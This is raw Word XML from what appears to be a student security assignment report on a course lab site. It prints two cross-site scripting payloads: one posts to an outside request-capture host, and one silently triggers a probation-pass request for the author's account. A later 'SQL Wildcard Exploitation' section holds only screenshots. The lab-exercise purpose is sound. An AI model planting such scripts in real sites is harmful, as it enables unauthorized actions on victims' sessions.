                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C5B6B84" wp14:editId="6A38929F">
                  <wp:extent cx="1987826" cy="1194227"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="23" name="图片 2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61"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1993015" cy="1197344"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4771" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5052EBED" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:t xml:space="preserve">XSS2.txt’s content is from the code mentioned in step 1. Because we only want to execute the content of function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pass_probation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">() without click button “Pass Probation”, we only need the content within the function. As for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>x.open</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(), because Question page and Profile page are different pages, and there is no element which ID is “username” in Question page,  we need to replace the URL with a full version, and add our username as the value of parameter “user” in the request manually. As the result, the final URL is  </w:t>
            </w:r>
            <w:hyperlink r:id="rId62" w:history="1">
              <w:r w:rsidRPr="001A1335">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/pass_probation.php?user=jiaxuan</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">, so </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>x.open</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> should look like: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1831BE70" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA3D1B">
              <w:t>x.open</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA3D1B">
              <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=jiaxuan", true)</w:t>
            </w:r>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DD9822C" w14:textId="77777777" w:rsidR="0023613F" w:rsidRDefault="0023613F" w:rsidP="00C10E9D"/>
    <w:p w14:paraId="2EF63515" w14:textId="67F2A38C" w:rsidR="0023613F" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>ontent of XSS1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D455952" w14:textId="3A10BB82" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78807EEB" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">var x = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7491FF4B" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>POST","https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>://jiaxuan.free.beeceptor.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFBDF40" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB06F99" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5EFCA" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D"/>
    <w:p w14:paraId="50E9F2B4" w14:textId="62791F7A" w:rsidR="0023613F" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. Content of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>SS2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D63ABE2" w14:textId="3C6384C9" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C5DC56" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="00EA3D1B">
        <w:t xml:space="preserve">var x = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A2A3E9" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>x.onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t xml:space="preserve"> = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277053A" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="00EA3D1B">
        <w:t xml:space="preserve">         if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>this.readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t xml:space="preserve"> == 4 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>this.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t xml:space="preserve"> == 200) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1044E8" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="00EA3D1B">
        <w:t xml:space="preserve">                return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A305305" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="00EA3D1B">
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEDBF62" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3E0E7" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>x.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=jiaxuan", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467D0A3" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00EA3D1B" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>x.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7589E003" w14:textId="1A58801D" w:rsidR="0023613F" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="00EA3D1B">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4045067C" w14:textId="4AF99FD4" w:rsidR="0088572A" w:rsidRDefault="0088572A" w:rsidP="0088572A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc71488359"/>
      <w:bookmarkStart w:id="47" w:name="A2_s4"/>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r w:rsidR="0023613F">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="0023613F">
        <w:t>SQL Wildcard</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve"> Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:p w14:paraId="0F44ABF7" w14:textId="77777777" w:rsidR="0023613F" w:rsidRPr="0023613F" w:rsidRDefault="0023613F" w:rsidP="0023613F"/>
    <w:p w14:paraId="2540C151" w14:textId="439D06C2" w:rsidR="0088572A" w:rsidRDefault="0088572A" w:rsidP="0023613F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023613F">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Screenshot of the request</w:t>
      </w:r>
      <w:r w:rsidR="0023613F">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and response for </w:t>
      </w:r>
      <w:hyperlink w:anchor="f4_s2" w:history="1">
        <w:r w:rsidR="0023613F" w:rsidRPr="005B022B">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>Finding-4, step2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0023613F">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7FE30C" w14:textId="10A61C4B" w:rsidR="0023613F" w:rsidRPr="0023613F" w:rsidRDefault="0023613F" w:rsidP="0023613F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F983320" wp14:editId="0FD42C08">
            <wp:extent cx="5271715" cy="1816403"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="26" name="图片 26"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Word&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5280722" cy="1819507"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3487F8" w14:textId="776EF246" w:rsidR="0023613F" w:rsidRDefault="0023613F" w:rsidP="0023613F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42CCFCDF" w14:textId="600615EB" w:rsidR="0023613F" w:rsidRDefault="0023613F" w:rsidP="0023613F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023613F">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Screenshot of the request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and response for </w:t>
      </w:r>
      <w:hyperlink w:anchor="f4_s3" w:history="1">
        <w:r w:rsidRPr="005B022B">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>Finding-4, step3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18688EE7" w14:textId="78A556DB" w:rsidR="0023613F" w:rsidRPr="00FC2B1D" w:rsidRDefault="005B022B" w:rsidP="00FC2B1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="348F6AF5" wp14:editId="0241F418">
            <wp:extent cx="5551221" cy="3427013"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="28" name="图片 2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10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5556413" cy="3430219"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0023613F" w:rsidRPr="00FC2B1D">
      <w:footerReference w:type="default" r:id="rId65"/>
      <w:footerReference w:type="first" r:id="rId6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1C802" w14:textId="77777777" w:rsidR="0046559C" w:rsidRDefault="0046559C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E2C2B9" w14:textId="77777777" w:rsidR="0046559C" w:rsidRDefault="0046559C"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60236EFF" w14:textId="77777777" w:rsidR="0046559C" w:rsidRDefault="0046559C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A660C65" w14:textId="77777777" w:rsidR="0046559C" w:rsidRDefault="004655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58DD1" w14:textId="40A9DFC5" w:rsidR="00B97362" w:rsidRDefault="006750D3">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00CC4150">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00CC4150">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="72ECC1AB" w14:textId="77777777" w:rsidR="00581736" w:rsidRDefault="0058173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2FD10" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B9736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0C11A" w14:textId="77777777" w:rsidR="0046559C" w:rsidRDefault="0046559C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4CA7B0" w14:textId="77777777" w:rsidR="0046559C" w:rsidRDefault="0046559C"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="783007F1" w14:textId="77777777" w:rsidR="0046559C" w:rsidRDefault="0046559C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ADA2AF" w14:textId="77777777" w:rsidR="0046559C" w:rsidRDefault="0046559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D29B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9242294"/>
    <w:lvl w:ilvl="0" w:tplc="FC60B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BA335A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49D499C8"/>
    <w:lvl w:ilvl="0" w:tplc="E9B2E7A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0D177AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC9E1CC2"/>
    <w:lvl w:ilvl="0" w:tplc="18C6C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6E90769"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4CA760E"/>
    <w:lvl w:ilvl="0" w:tplc="953230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362"/>
    <w:rsid w:val="00001738"/>
    <w:rsid w:val="00053557"/>
    <w:rsid w:val="000D5827"/>
    <w:rsid w:val="0010227E"/>
    <w:rsid w:val="001226A4"/>
    <w:rsid w:val="0018343F"/>
    <w:rsid w:val="00185948"/>
    <w:rsid w:val="001A2733"/>
    <w:rsid w:val="001A65EF"/>
    <w:rsid w:val="001C2B0E"/>
    <w:rsid w:val="001D1AEB"/>
    <w:rsid w:val="001E3626"/>
    <w:rsid w:val="0020694D"/>
    <w:rsid w:val="00215492"/>
    <w:rsid w:val="00216019"/>
    <w:rsid w:val="0023613F"/>
    <w:rsid w:val="002917EE"/>
    <w:rsid w:val="002C3D4B"/>
    <w:rsid w:val="00315F26"/>
    <w:rsid w:val="00324D19"/>
    <w:rsid w:val="00336FF0"/>
    <w:rsid w:val="00346406"/>
    <w:rsid w:val="003647E1"/>
    <w:rsid w:val="00381A8D"/>
    <w:rsid w:val="003D372D"/>
    <w:rsid w:val="003D44DC"/>
    <w:rsid w:val="003F4D0B"/>
    <w:rsid w:val="00430071"/>
    <w:rsid w:val="0046559C"/>
    <w:rsid w:val="00467058"/>
    <w:rsid w:val="004939A9"/>
    <w:rsid w:val="004C16E2"/>
    <w:rsid w:val="004C2FE3"/>
    <w:rsid w:val="004E04E4"/>
    <w:rsid w:val="00545D13"/>
    <w:rsid w:val="00581736"/>
    <w:rsid w:val="005861C0"/>
    <w:rsid w:val="005B022B"/>
    <w:rsid w:val="005C60C2"/>
    <w:rsid w:val="005C7E00"/>
    <w:rsid w:val="005D55FA"/>
    <w:rsid w:val="005D68B9"/>
    <w:rsid w:val="00667EC7"/>
    <w:rsid w:val="006750D3"/>
    <w:rsid w:val="00696EC2"/>
    <w:rsid w:val="006A1688"/>
    <w:rsid w:val="006C6219"/>
    <w:rsid w:val="006F6E6C"/>
    <w:rsid w:val="0070389C"/>
    <w:rsid w:val="00717E64"/>
    <w:rsid w:val="00722387"/>
    <w:rsid w:val="00756BC9"/>
    <w:rsid w:val="00770182"/>
    <w:rsid w:val="007A0F1A"/>
    <w:rsid w:val="007A5547"/>
    <w:rsid w:val="007B5DA2"/>
    <w:rsid w:val="007D73B9"/>
    <w:rsid w:val="007D7D0E"/>
    <w:rsid w:val="007E3FBA"/>
    <w:rsid w:val="007F3054"/>
    <w:rsid w:val="00802EEA"/>
    <w:rsid w:val="008069B9"/>
    <w:rsid w:val="00822932"/>
    <w:rsid w:val="0088572A"/>
    <w:rsid w:val="008A3B27"/>
    <w:rsid w:val="008B0F50"/>
    <w:rsid w:val="008D4777"/>
    <w:rsid w:val="00935E89"/>
    <w:rsid w:val="00940FB5"/>
    <w:rsid w:val="009750A5"/>
    <w:rsid w:val="009B7DF0"/>
    <w:rsid w:val="009F52D1"/>
    <w:rsid w:val="00A25ADA"/>
    <w:rsid w:val="00A269D7"/>
    <w:rsid w:val="00A4641D"/>
    <w:rsid w:val="00A63284"/>
    <w:rsid w:val="00A74CAB"/>
    <w:rsid w:val="00A770D0"/>
    <w:rsid w:val="00AA462F"/>
    <w:rsid w:val="00B6473F"/>
    <w:rsid w:val="00B90521"/>
    <w:rsid w:val="00B97362"/>
    <w:rsid w:val="00BE2D35"/>
    <w:rsid w:val="00C10E9D"/>
    <w:rsid w:val="00C116D0"/>
    <w:rsid w:val="00C50149"/>
    <w:rsid w:val="00C55B37"/>
    <w:rsid w:val="00C8401D"/>
    <w:rsid w:val="00CA4C02"/>
    <w:rsid w:val="00CC4150"/>
    <w:rsid w:val="00CD5B85"/>
    <w:rsid w:val="00D347F7"/>
    <w:rsid w:val="00D705B9"/>
    <w:rsid w:val="00D85BBC"/>
    <w:rsid w:val="00DA1798"/>
    <w:rsid w:val="00DC3D3D"/>
    <w:rsid w:val="00E544D2"/>
    <w:rsid w:val="00E907C8"/>
    <w:rsid w:val="00EA3D1B"/>
    <w:rsid w:val="00EB7973"/>
    <w:rsid w:val="00EC2AD2"/>
    <w:rsid w:val="00ED2041"/>
    <w:rsid w:val="00ED3F37"/>
    <w:rsid w:val="00EF2AA4"/>
    <w:rsid w:val="00F24964"/>
    <w:rsid w:val="00F3796A"/>
    <w:rsid w:val="00F43637"/>
    <w:rsid w:val="00F77F68"/>
    <w:rsid w:val="00FA09ED"/>
    <w:rsid w:val="00FC2B1D"/>
    <w:rsid w:val="00FD2C45"/>
    <w:rsid w:val="00FE19C5"/>
    <w:rsid w:val="00FE41E0"/>
    <w:rsid w:val="00FF0D10"/>
    <w:rsid w:val="00FF70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09F29"/>
  <w15:docId w15:val="{48A90766-017F-D448-9D71-6731F62B9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19C5"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial"/>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table" w:customStyle="1" w:styleId="a6">
    <w:basedOn w:val="a1"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a7">
    <w:basedOn w:val="a1"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a8">
    <w:basedOn w:val="a1"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED2041"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED2041"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E3626"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E3626"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E3626"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
